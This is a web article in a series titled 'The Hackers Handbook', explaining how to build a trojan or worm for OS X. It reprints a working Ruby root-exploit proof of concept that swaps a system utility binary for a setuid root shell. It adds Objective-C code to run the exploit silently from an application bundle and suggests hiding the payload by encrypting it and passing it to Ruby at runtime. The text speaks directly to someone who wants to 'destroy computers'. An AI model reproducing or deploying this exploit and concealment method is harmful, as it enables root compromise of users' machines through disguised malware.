Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Home » Learning Curve » Developers Workshop

The Hackers Handbook — Penetration

It's easy to write a nasty worm for OS X. Here's how. Third of many parts.


Get It

Try It

The first article in this series discussed the ease with which worms can be propagated on OS X and highlighted two types of system flaws; the second article in this series discussed a method of propagation; this article will deal with actually attacking the target system.

Where Embed?

Presuming use of the simplest method of propagation - spreading a Cocoa bundle - one might also presume an attack that comes from a module embedded in the bundle - such as an executable in the Resources subdirectory. This is easiest but not necessarily ideal yet if this is the method chosen it's very straightforward: one need only take the proof of concept from MOAB #15 and embed it.

# !/usr/bin/ruby

# Exploit for MOAB-15-01-2007
# (c) 2006 LMH <lmh [at] info-pull.com>.

require 'fileutils'

DISK_UTIL_COMMAND = "/usr/sbin/diskutil repairPermissions /"
AVAILABLE_TARGETS = [
    "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
    "/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
    "/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"
]

path_to_bin = (AVAILABLE_TARGETS[ARGV[0].to_i] || AVAILABLE_TARGETS[0])
path_to_back = File.join("/tmp", File.basename(path_to_bin))

if File.exists?(path_to_bin)
    unless File.exists?(path_to_back)
        FileUtils.cp(path_to_bin, path_to_back)
    end
end

WRAP_CODE = 'int main() {setuid(0); setgid(0); seteuid(0); system("/bin/sh -i");}'
COMPILE = "echo '#{WRAP_CODE}' > /tmp/t.c && gcc /tmp/t.c -s -o /tmp/o && rm -fr /tmp/t.c"
system(COMPILE)

FileUtils.mv("/tmp/o", path_to_bin)
system(DISK_UTIL_COMMAND)

Note the above code will not output anything - and you won't be executing this from a Terminal.app window anyway. The user sees nothing.

Note as well that the above snippet only establishes a root shell; if you want to do something more 'constructive' (destructive) you need to modify the code.

Running the Task

Presuming you've got someone to test your 'application' you must now run the above MOAB script within it. This too is completely straightforward.

void run_task(NSString *payload) {
    NSTask *task = [[NSTask alloc] init];

    [task setLaunchPath:[[NSBundle mainBundle] pathForResource:payload ofType:0]];
    [task launch];
}

That's it - the above snippet will have a memory leak which you can address by declaring task outside at global scope and then adding yourself as a notification observer for NSTaskDidTerminateNotification, waiting for the task to complete and then releasing the object. But if you're trying to destroy computers you're not going to be too worried about a memory leak.

Greater Obfuscation

Of course the cautious user might peek inside the bundle before running it and become suspicious of a file marked with eXecutable bits. But there are ways around that.

For starters you don't have to have the file so marked - you can change the permissions on the file once your Cocoa application is up and running. To take things even further you can embed the script in your Cocoa executable, write it out to disk at runtime, and run it from there. To take things even further you can encrypt the script inside your Cocoa executable so nosy users who actually look inside still won't see anything suspicious.

Or you can use the entire script as a program argument to /usr/bin/ruby. Simply encrypt the script inside your Cocoa executable, decrypt it at runtime, and pass the entire string as argv[1] to the ruby interpreter.

void ruby_task(NSString *script) {
    NSTask *task = [[NSTask alloc] init];

    [task setLaunchPath:@"/usr/bin/ruby"];
    [task setArguments:[NSArray arrayWithObject:script]];
    [task launch];
}

Whatever level of sophistication you choose you're bound to fool all but the most careful of users. And even a few pros will be caught with their pants down when you penetrate.

'TO BE CONTINUED'

See Also
Wooden Leg
Hacking the iPhone
'How I Hacked the iPhone'
iPhone
Alpine Dottie
Effective UID: 0
iPhone and Security
iPhone and the Media
iPhone Hack to be Patched
iPhone OS X System Architecture

Thanks to Devon at Pixel Groovy for the excellent artwork.

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.